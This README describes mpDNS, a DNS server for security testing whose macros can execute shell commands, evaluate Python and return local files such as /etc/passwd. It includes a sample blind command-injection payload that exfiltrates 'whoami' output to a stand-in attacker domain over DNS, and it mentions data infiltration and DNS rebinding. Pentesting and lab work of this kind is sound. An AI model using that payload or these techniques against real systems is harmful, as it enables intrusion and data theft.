mpDNS: Multi-Purpose DNS Server

mpDNS aka multi-purpose DNS Server

DNS Server with multiple useful features

• Should work on Python 2 and 3
• names.db -> holds all custom records (see examples)
• Simple wildcards like *.example.com
• Catch unicode dns requests
• Custom actions aka macro:
  • {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
  • {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
  • {{file::/etc/passwd}} -> Respond with localfile contents
  • {{resolve}} -> Forward DNS request to local system DNS
  • {{resolve::example.com}} -> Resolve example.com instead of original record
  • {{echo}} -> Response back with peer address
  • {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
• Supported query types: A, CNAME, TXT
• Update names.db records without restart/reload with ./mpdns.py -e

Offensive and Defensive purposes:

1. You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
2. Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
3. Easily infiltrate 65K of data in one TXT query
4. DNS Rebinding
5. Execute custom macro action on a specific query (useful in malware-analysis lab environments)
6. And lots more. It is highly customizable.

Install

git clone https://github.com/nopernik/mpDNS

Use

./mpdns.py

• Edit names.db with ./mpdns.py -e no restart required

Tutorial

Copyright (C) 2018 nopernik